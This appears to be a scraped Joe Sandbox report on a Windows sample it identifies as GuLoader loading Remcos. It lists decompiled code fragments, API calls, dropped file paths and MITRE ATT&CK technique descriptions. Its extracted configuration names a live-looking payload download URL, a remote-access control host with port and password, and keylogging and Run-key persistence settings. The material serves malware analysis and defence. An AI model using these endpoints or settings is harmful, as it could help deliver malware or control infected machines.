					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000014.00000002.1497469211.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.1497430225.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497528656.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497563830.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497635882.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497724577.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497772991.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497812165.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497856729.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497886694.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497929492.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000014.00000002.1497975486.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_wqs.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: wqs.exePID: 2540, Parent PID: 4356COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	21
Total number of Limit Nodes:	2

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01674FAF Relevance: 1.6, APIs: 1, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 01674FB8

Memory Dump Source

Source File: 00000021.00000002.5714077681.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_1660000_wqs.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 2805c5200494f6334bfc350ca1f88661bb9eab03dd63f05f1a953390c6457f97
Instruction ID: 5bf922daf32180e9a68f395cf88d36f407bbc9b27604f384fb5462e081ec827e
Opcode Fuzzy Hash: 2805c5200494f6334bfc350ca1f88661bb9eab03dd63f05f1a953390c6457f97
Instruction Fuzzy Hash: C9413D347043068FEB36D9289DA47E22392AF52256FD582A7CC468B292D335CDC6C742

Uniqueness

Uniqueness Score: -1.00%

Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx
Source: Malware configuration extractor	URLs: entralent200.sytes.net

Source: 00000003.00000000.827206659.0000000001660000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1rTDvne0SIi78eB9wV1iwwAGXz7RS5mjx"}
Source: 00000021.00000002.5715734688.00000000018B2000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Remcos {"Host:Port:Password": "entralent200.sytes.net:2321:1", "Assigned name": "Entralent_user 3", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "wqs.exe", "Startup value": "ws", "Hide file": "Enable", "Mutex": "Remcos-G5O10D", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "", "Keylog folder": "", "Keylog file max size": "0"}

Source: Over Prime.exe	Virustotal: Detection: 11%			Perma Link
Source: Over Prime.exe	ReversingLabs: Detection: 12%

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Over Prime.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: Remcos

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wqs.exe_5de7e7b08b3e5c86b8b02a256aa7bac32e252e_2f3aa718_a2a4a9c4-75e6-4d16-9eb5-77cfaf3dc85d\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER90BC.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER92B1.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER934F.tmp.xml

C:\Users\user\AppData\Local\Temp\Skims.Hos6

C:\Users\user\AppData\Local\Temp\estuaries.pro

C:\Users\user\AppData\Local\Temp\fossildelta.dll

C:\Users\user\AppData\Local\Temp\install.vbs

C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsf8786.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nstC2CA.tmp\System.dll

C:\Users\user\AppData\Local\Temp\printer-network-symbolic.symbolic.png

Windows Analysis Report
Over Prime.exe

Function 0040352D Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450
stringfilecomCOMMON

Function 004056DE Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405C49 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre